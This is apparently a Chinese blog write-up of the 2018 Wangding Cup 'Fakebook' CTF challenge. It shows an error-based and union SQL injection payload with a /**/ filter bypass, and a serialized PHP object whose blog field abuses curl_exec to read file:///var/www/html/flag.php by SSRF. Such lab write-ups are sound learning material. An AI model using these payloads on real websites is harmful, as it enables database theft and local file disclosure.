网鼎杯 2018 Fakebook

最新推荐文章于 2022-10-23 17:09:49 发布

k_du1t

最新推荐文章于 2022-10-23 17:09:49 发布

阅读量1.5k

点赞数

分类专栏： ctf 文章标签： php

本文链接：https://blog.csdn.net/weixin_45751765/article/details/120580628

版权

ctf 专栏收录该内容

46 篇文章 1 订阅

订阅专栏

1NDEX

0x00 初试
0x01 复现

0x00 初试

在这里插入图片描述
一开始有两个选项：一个join,一个login

此处blog存在过滤
注册完返回首页发现username栏是超链接
单击后发现
url–>
http://47bdcd94-3a3d-4ae5-af77-4390d01fd436.node4.buuoj.cn:81/view.php?no=1
盲猜是注入(讲真我一开始真没有意识先去判断是数字型注入还是字符型注入)
因为手注测试的时候十分的奇怪…
先通过updatexml报错注入得到一些信息在这里插入图片描述
注注注得到
database: fakebook
table: user
column: no,username,passwd,data
but报错注入时显示出来的数据有限我觉得很麻烦(group_concat压根不够显示data列的)…感觉不是这个思路
果断看wp了

0x01 复现

首先基本功非常不扎实…就嘎了
再复习一下注入有两个小类是数字型和字符型注入

https://www.php.cn/safe/455989.html

&&做题养成扫目录习惯??(不知道是好是坏，实在没思路就扫一下⑧)
/robots.txt -->user.php.bak
已经可以猜到是反序列化了

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
    
}

补充知识：curl_exec()–>ssrf

curl_exec(); curl支持很多协议，有ftp, ftps, http, https, gopher, telnet, dict, file, ldapa

https://blog.csdn.net/Ethan024/article/details/115827938

本地测试一下

在这里插入图片描述

done

curl部分函数

【】curl_init ： 初始化一个cURL会话，供curl_setopt(), curl_exec()和curl_close() 函数使用。
# 初始化一个会话
【】curl_setopt ：请求一个url。
# set options 进行一些配置
其中CURLOPT_URL表示需要获取的URL地址，后面就是跟上了它的值。

【*】CURLOPT_RETURNTRANSFER 将curl_exec()获取的信息以文件流的形式返回，而不是直接输出。

【*】curl_exec，成功时返回 TRUE，或者在失败时返回 FALSE。然而，如果 CURLOPT_RETURNTRANSFER选项被设置，函数执行成功时会返回执行的结果，失败时返回 FALSE 。

【*】CURLINFO_HTTP_CODE ：最后一个收到的HTTP代码。
curl_getinfo：以字符串形式返回它的值，因为设置了CURLINFO_HTTP_CODE，所以是返回的状态码。

原文链接：https://blog.csdn.net/qq_43622442/article/details/105633194

看了dl_wp 是数字型注入(忘了就尬了)
下面很顺畅，常规思路
联合注入就看着很舒服了
tips: union select被过滤了中间加个注释符/**/就绕过了

payload:
-1%20union/**/select%201,(select(group_concat(concat_ws(%27~%27,no,username,passwd,data)))from(users)),3,4#
在这里插入图片描述
看到第四列data是序列化字符串 ->对应上user.php
显然blog就是我们的利用点了 -->file协议
其实我是真的没扫到flag.php…
payload

$a= new UserInfo();
$a->name='admin';
$a->age=21;
$a->blog='file:///var/www/html/flag.php';
echo(serialize($a));

在这里插入图片描述

done

k_du1t

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
网鼎杯 2018 Fakebook

1NDEX0x00 初试0x01 复现0x00 初试一开始有两个选项：一个join,一个login此处blog存在过滤注册完返回首页发现username栏是超链接单击后发现url–>http://47bdcd94-3a3d-4ae5-af77-4390d01fd436.node4.buuoj.cn:81/view.php?no=1盲猜是注入(讲真我一开始真没有意识先去判断是数字型注入还是字符型注入)因为手注测试的时候十分的奇怪…先通过updatexml报错注入得到一些信息注注
复制链接

扫一扫

专栏目录